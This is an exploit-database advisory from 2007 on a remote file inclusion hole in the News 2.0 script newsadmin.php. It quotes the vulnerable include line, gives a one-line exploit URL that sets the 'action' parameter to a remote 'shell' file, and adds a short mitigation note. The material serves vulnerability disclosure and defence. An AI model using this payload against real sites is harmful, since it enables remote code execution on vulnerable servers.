News 2.0 (newsadmin.php) Remote File Include Vulnerabilities

vendor:

News 2.0

by:

Mogatil

5.5

CVSS

MEDIUM

Remote File Include

CWE

Product Name: News 2.0

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

News 2.0 (newsadmin.php) Remote File Include Vulnerabilities

The vulnerability allows an attacker to include and execute arbitrary files from remote servers by exploiting the 'newsadmin.php' script. By manipulating the 'action' parameter in the URL, an attacker can specify the file to be included and executed. In this case, the exploit uses the 'shell' file as the payload.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate the 'action' parameter to prevent remote file inclusion.

Source

Exploit-DB raw data:

####################### S==A==U==D==I #########################

News 2.0 (newsadmin.php) Remote File Include Vulnerabilities

##############################################################

Found By : Mogatil , jjl@hotmail.com

##############################################################

Script Site :
http://www.tools4web.de/zaehler.php?i=5
##############################################################
File : /newsadmin.php

include($action.".inc.php");

##############################################################

Thanx: [cold zero] [gawey] [crazy man] [scorbion_22] [the_muslim_sniper]

##############################################################

Exploit :[Path]/newsadmin.php?action=shell

##############################################################

# milw0rm.com [2007-05-14]